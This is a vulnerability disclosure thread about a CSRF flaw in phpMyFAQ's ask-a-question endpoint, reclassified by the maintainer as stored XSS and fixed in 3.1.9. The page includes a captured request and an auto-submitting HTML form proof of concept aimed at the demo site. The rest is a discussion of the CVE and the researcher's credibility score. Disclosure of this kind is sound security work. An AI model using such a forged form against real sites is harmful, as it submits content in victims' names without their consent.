Missing CSRF protection in thorsten/phpmyfaq

Valid

Reported on

Nov 24th 2022


Description

Any user can Add Questions on FAQ section --> https://roy.demo.phpmyfaq.de/index.php?action=ask&category_id=0

This section is vulnerable to CSRF. The aggressor can abuse this without prior knowledge of others'. The successful CSRF will send new questions from the victim's browser

Captured Request

POST /ajaxservice.php?action=savequestion HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=<ID-VALUE>; pmf_sid=22383; cookieconsent_status=dismiss; phpbb3_6zg4_u=1; phpbb3_6zg4_k=; phpbb3_6zg4_sid=68a52c0cd02a54757d476703488f677a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Sec-Gpc: 1
Te: trailers

lang=en&name=Demouser&email=demouser%40phpmyfaq.de&category=13&question=Execute-4?

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://roy.demo.phpmyfaq.de/ajaxservice.php?action=savequestion" method="POST">
      <input type="hidden" name="lang" value="en" />
      <input type="hidden" name="name" value="Demouser" />
      <input type="hidden" name="email" value="demouser&#64;phpmyfaq&#46;de" />
      <input type="hidden" name="category" value="13" />
      <input type="hidden" name="question" value="Execute&#45;4&#63;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

PoC Video

Link --> https://drive.google.com/file/d/1uIOoJ-mg17hZutheEbUW3umI1WlU_vLP/view?usp=sharing

Impact

Attacker sends his/her/their queries, including abusive words by exploiting other clients

Occurrences

(Sorry about this. It's tested from demo version)

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 2 months ago
Kiran PP modified the report
2 months ago
We have contacted a member of the thorsten/phpmyfaq team and are waiting to hear back 2 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 2 months ago
Thorsten Rinne modified the CWE from Cross-Site Request Forgery (CSRF) to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') a month ago
Thorsten Rinne
a month ago

Maintainer


The CSRF isn't the big issue here, but the stored XSS in the admin section.

Kiran PP
a month ago

Researcher


If you get its potential, then you can track it as a bug & fix the case

Regards,

The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
Thorsten Rinne validated this vulnerability a month ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.1.9 with commit e2ea33 a month ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 31st 2022
index.php#L0 has been validated
Kiran PP
a month ago

Researcher


Why can't we go for a CVE if it's have a potential impact?

Just let me know

Kiran PP
a month ago

Researcher


@admin

The CSRF bug was therebut the major selected by maintainer so I received a minor penalty (unfair)

And my credibility is decreased to 2.7 even after this discovery. I hope you can do some adjustment and help to boost my label "pro" to "master"

regards,

Thorsten Rinne
a month ago

Maintainer


You can create a CVE if you like

Kiran PP
a month ago

Researcher


@admin @maintainer

Yeah, Then please assign a CVE for this one: CWE-79: Cross-site Scripting (XSS) - Stored

Kiran PP
a month ago

Researcher


@admin, Update??

Kiran PP
a month ago

Researcher


@Maintainer, Can you please do a favor for me? the admin is not responding here. Please track a CVE for this bug!

Regards,

Thorsten Rinne
a month ago

Maintainer


@7h3h4ckv157 how can I do that? Never did that before.

Kiran PP
a month ago

Researcher


@Maintainer I guess you can see that on your UI. Else, let's wait for @admin

Pavlos
a month ago

Admin


We will assign a CVE and publish it on December 31st :)

Kiran PP
a month ago

Researcher


Thanks, @admin

But please assist with this 👇🏻

The CSRF bug was there but the major was selected by the maintainer so I received a minor penalty (unfair)

And my credibility decreased to 2.7 even after this discovery. I hope you can do some adjustments and help to boost my label "pro" to "master"

Thorsten Rinne gave praise a month ago
Thanks again to @7h3h4ckv157 for finding this issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Kiran PP
a month ago

Researcher


@maintainer I appreciate that. But I don't know what's wrong. Now my credibility decreased from 2.7 to 2.6 🙂

@admin Seriously I've no idea about the backend function!

Pavlos
a month ago

Admin


If the CWE or CVSS are inaccurate, your credibility takes a minor hit. Let's resolve this on chatwoot via Chat with us :)

Ben Harvie
a month ago

Admin


As requested, this report will now receive a CVE on publication :)

Kiran PP
a month ago

Researcher


Thanks, @Ben 😄

Kiran PP
a month ago

Researcher


Please do share the details once published!

Regards,

Thorsten Rinne published this vulnerability a month ago
Kiran PP
9 days ago

Researcher


@admin

NIST: NVD Base Score: 5.4 MEDIUM

There's nothing that went wrong on my side. Kindly do something to fix my rank.

Regards,

to join this conversation